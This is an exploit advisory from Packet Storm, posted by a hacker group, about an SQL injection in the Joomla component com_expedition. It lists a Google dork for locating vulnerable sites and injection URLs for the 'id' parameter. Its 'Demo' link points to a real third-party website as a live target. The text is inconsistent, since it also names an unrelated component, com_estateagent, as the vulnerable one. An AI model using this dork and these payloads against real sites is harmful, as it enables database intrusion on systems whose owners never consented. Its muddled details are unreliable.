Joomla Expedition SQL Injection

2011-10-09T00:00:00
ID PACKETSTORM:105635
Type packetstorm
Reporter BHG Security Center
Modified 2011-10-09T00:00:00

Description

                                        
                                            `=====================================================================  
__________.__ __ ___ ___  
\______ \ | _____ ____ | | __ / | \ ____  
| | _/ | \__ \ _/ ___\| |/ / ______ / ~ \/ ___\  
| | \ |__/ __ \\ \___| < /_____/ \ Y / /_/ >  
|______ /____(____ /\___ >__|_ \ \___|_ /\___ /  
\/ \/ \/ \/ \//_____/  
.ORG  
  
>> Exploit database separated by exploit  
  
[+] Site : 1337db.com   
[+] Support e-mail : submit[at]1337db.com   
  
#########################################   
I'm Net.Edut0r 1337 Member from 1337 DataBase   
#########################################   
======================================================================  
####  
# Exploit Title: Joomla Component (com_expedition) <= SQL Injection Vulnerability   
# Author: BHG Security Center  
# Date: 2011-10-09  
# Vendor: N/A  
# E-mail: Net.Edit0r@att.net | black.hat.tm@gmail.com  
# Website: www.black-hg.org  
# Google Dork: inurl:index.php?option=com_expedition  
# Category:: Webapps  
# Tested on: [Windows Vista Edition Intégral- French]  
# http://demo15.joomlaapps.com/  
####  
  
  
[*] ExpLo!T :  
  
http://127.0.0.1/index.php?option=com_expedition&task=detail&id=-3235'  
  
http://127.0.0.1/index.php?option=com_expedition&task=detail&id=[SQLi]  
  
http://127.0.0.1/path/index.php?option=com_expedition&task=detail&id=[SQLi]  
  
[*] Demo : http://www.astrobio.net/index.php?option=com_expedition&task=detail&id=-3235  
  
####  
  
[+] Peace From Algeria  
  
Vunl Component : com_estateagent   
  
Error in file joomla Component (com_estateagent) Sql Injection  
  
A vulnerable parameter $ detail&id=  
  
####  
  
=================================**BHG Security Center**=====================================|  
# Greets To : |  
|  
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili |  
cmaxx M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y |  
THANKS TO ALL Iranian HackerZ | |  
============================================================================================ |  
`